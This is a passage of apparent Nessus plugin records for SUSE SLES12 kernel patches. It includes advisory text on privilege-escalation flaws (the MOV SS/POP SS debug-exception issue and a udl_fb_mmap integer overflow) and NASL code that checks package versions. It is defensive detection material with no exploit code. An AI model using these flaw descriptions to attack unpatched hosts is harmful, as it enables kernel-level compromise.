FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in drivers/gpu/drm/udl/udl_fb.c had an integer-overflow vulnerability allowing local users with access to the udldrmfb driver to obtain full read and write permissions on kernel physical pages, resulting in a code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "SUSE_SU-2018-1531-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110364", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1531-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1531-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110364);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/12/01 13:19:05\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1531-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.74-60_64_51 fixes several\nissues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181531-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c8e8710b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2018-1057=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-1057=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_51-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_51-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_51-default-9-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_51-xen-9-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:15", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.61-52_101 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in drivers/gpu/drm/udl/udl_fb.c had an integer-overflow vulnerability allowing local users with access to the udldrmfb driver to obtain full read and write permissions on kernel physical pages, resulting in a code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "SUSE_SU-2018-1538-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110371", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1538-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1538-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110371);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/12/01 13:19:05\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1538-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_101 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181538-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f1fa52e5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-1045=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_101-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_101-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_101-default-6-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_101-xen-6-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}